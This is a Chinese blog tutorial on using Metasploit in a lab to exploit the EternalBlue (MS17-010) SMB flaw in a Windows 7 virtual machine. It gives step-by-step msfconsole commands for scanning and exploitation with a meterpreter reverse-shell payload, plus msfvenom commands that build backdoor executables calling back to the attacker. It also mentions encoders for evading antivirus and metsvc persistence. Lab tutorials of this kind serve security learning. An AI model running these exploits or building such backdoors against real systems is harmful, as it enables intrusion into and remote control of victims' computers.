利用msf控制目标电脑

最新推荐文章于 2023-06-24 20:42:42 发布
最新推荐文章于 2023-06-24 20:42:42 发布
阅读量706 收藏 7
点赞数 1
分类专栏: 工具使用 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/115366310
版权

利用msf控制目标电脑

准备工作

  • kali Linux虚拟机一台
  • win7虚拟机一台(要关闭防火墙和杀软的)
  • 注意两台机器要连接到同一个网络

永恒之蓝漏洞

  • 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
  • SMB协议:它能被用于Web连接和客户端与服务器之间的信息沟通。
  • 攻击方式:恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

msf简介

  • Kali可直接使用,存放目录:/usr/share/MSF-framework/

  • Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。

  • msf的六个模块

    • auxiliary
      负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

    • exploits
      利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

    • payloads
      成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。

      single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
      stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
      stages:利用stagers建立的连接下载后续payload

    • encoders
      对payload进行加密,躲避AntiVirus检查的模块

    • nops
      提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。

    • post
      后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作

  • msfvenom

    • msfvenom是msfpayloadmsfencode的组合,将这两个工具集成在一个框架实例中,用来生成后门,在目标机上执行后门,在本地监听上线。
    • msfvenom —list platforms #查看支持系统平台
      msfvenom —list archs #查看支持的系统架构
      msfvenom -l payload #列出所有可用的payload
      msfvenom -l formats #列出所有的输出格式
      msfvenom -l encrypt #列出所有的加密方式
      msfvenom -l encoders #列出所有的编码器

利用永恒之蓝漏洞攻击win7

  • 打开kali终端,输入ifconfig 。可以看到inet 192.168.1.1,这是 kali的内网 ip,记录下它。
    在这里插入图片描述

  • 启动msf msfconsole
    在这里插入图片描述

  • 永恒之蓝漏洞编号为ms17-010
    输入搜索命令search ms17-010
    在这里插入图片描述

  • 利用辅助模块扫描目标
    use auxiliary/scanner/smb/smb_ms17_010或者use 1
    在这里插入图片描述查看所需设置:options
    设置目标地址:set rhosts +IP地址
    设置目标端口:set rpost +445
    攻击:run
    在这里插入图片描述

  • 利用攻击模块对目标进行攻击
    use exploit/windows/smb/doublepulsar_rce或者use 2
    在这里插入图片描述查看所需设置options
    设置目标地址:set RHOSTS 192.168.235.128
    设置目标端口:set RPORT 445
    设置payload:set payload windows/x64/meterpreter/reverse_tcp
    设置本地地址:set LHOST 192.168.1.139
    攻击:run或者exploit
    在这里插入图片描述

  • msfvenom生成后门木马

    • msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
      msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe
      在这里插入图片描述打开主文件夹看到一个payload.exe的文件
      在这里插入图片描述
      msfvenom -p windows/meterpreter(要生成的模块)/reverse(反弹)_tcp lhost=攻击机(自己)的ip地址 lport=攻击机所开启监听的端口号 -f(要输出的文件格式)exe -o(output输出)shell.exe
      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.137 lport=4444 -f exe -o shell.exe

  • 设置监听 use
    查看所需设置,开始设置,run
    然后当win7点击后,就能看到他上线了,开始各种操作

  • 设置编码

  • 权限维持metsvc的三个文件

吃_早餐
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2574
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
使用MSFPC远程控制
y3174445239的博客
06-24 571
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
使用msfvenom实现远程控制.
最新发布
2301_78457119的博客
06-24 711
在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 366
metaspolit配合shellter渗透windows
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 937
Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
第九十七课:MSF配置自定义Payload控制目标主机权限.docx
09-15
MSF 配置自定义 Payload 控制目标主机权限 MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,它提供了一个强大的框架来评估和模拟攻击各种类型的系统和网络。MSF 的 exploit 模块下是支持 set ...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
第九十七课:msf配置自定义payload控制目标主机权限1
08-03
在本课程中,我们探讨了如何使用Metasploit(MSF)框架配置自定义payload以控制目标主机权限。Metasploit是一个广泛使用的安全测试工具,它包含了大量的exploit模块和payload选项,允许安全专家模拟攻击行为,同时也...
渗透测试/metasploit控制目标电脑/ms17-010
dkpower111的博客
01-31 337
MSF msf是一款开源安全漏洞利用和测试工具,集成了各种平台常见的溢出漏洞和流行的shellcode,并保持持续更新 模块 auxiliary: 辅助模块,辅助渗透 exploits: 漏洞利用模块,包含主流漏洞利用脚本 payloads: 攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 post: 后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令 encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵
6.4-5 msf被控端与主控端
weixin_70294597的博客
06-08 158
远程控制是一个常见计算机术语,指的就是可以在一台设备上操纵另一台设备的软件。通常情况下,远程控制分为两个部分,即被控端与主控端,一台计算机被植入被控端,他就会被另一台装有主控端的计算机所控制
MSF+内网穿透 实现远控
yxngu
05-09 1万+
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
利用Metasploit控制目标电脑(Win7_x64系统)
天涯的浪子
07-28 790
MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。 MS17-010(永恒之蓝)漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shado...
msf渗透脚本之交换鼠标左右功能
Cosmopolitan的博客
03-07 1191
swap.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::...
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4375
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
Metasploit小技巧
weixin_30443813的博客
08-07 289
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
msf 直接控制大多数设备
艾与代码
01-07 1422
这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来…以前的博客还是很稚嫩啊… 注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现 (2019/1/7添加:)大致流程: 1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当 2.监听局域网数据流:利用arproof或ettercap或wire...
怎么利用msf入侵电脑
02-21
我不太清楚具体的步骤,但是我可以提供一些概念性的指导:首先,你需要获取一个可用的Metasploit框架,然后使用它来扫描目标系统,检查是否有可利用的漏洞。如果有,你可以尝试利用这些漏洞来入侵目标系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值